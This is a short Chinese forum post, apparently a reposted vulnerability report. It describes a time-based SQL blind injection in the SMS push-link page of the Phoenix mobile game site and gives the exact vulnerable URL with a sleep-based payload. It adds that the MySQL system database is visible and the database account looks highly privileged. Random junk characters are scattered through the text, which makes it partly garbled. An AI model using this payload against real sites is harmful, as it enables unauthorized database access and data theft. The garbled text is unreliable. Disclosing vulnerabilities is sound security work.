简要描述:
" d) L, g; U% _& l凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。, Q0 p a' Q0 Y# p- ]
+ }" X; v7 m* C详细说明:
- y1 n! r* D" P/ ~存在SQL盲注url:( Q8 P) }; j: W8 w9 d, k; E0 V! n$ K! d
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
: E0 Q# `9 h c' t: D- |! c7 Vhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
% `9 X! A' Q, d: Khttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
' ^4 A: G8 S: w+ g( {1 N+ uhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg8 |$ \# O' N9 S3 Y% O7 k
' k$ @8 l7 G7 j7 S3 B' c
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
分享
支持
反对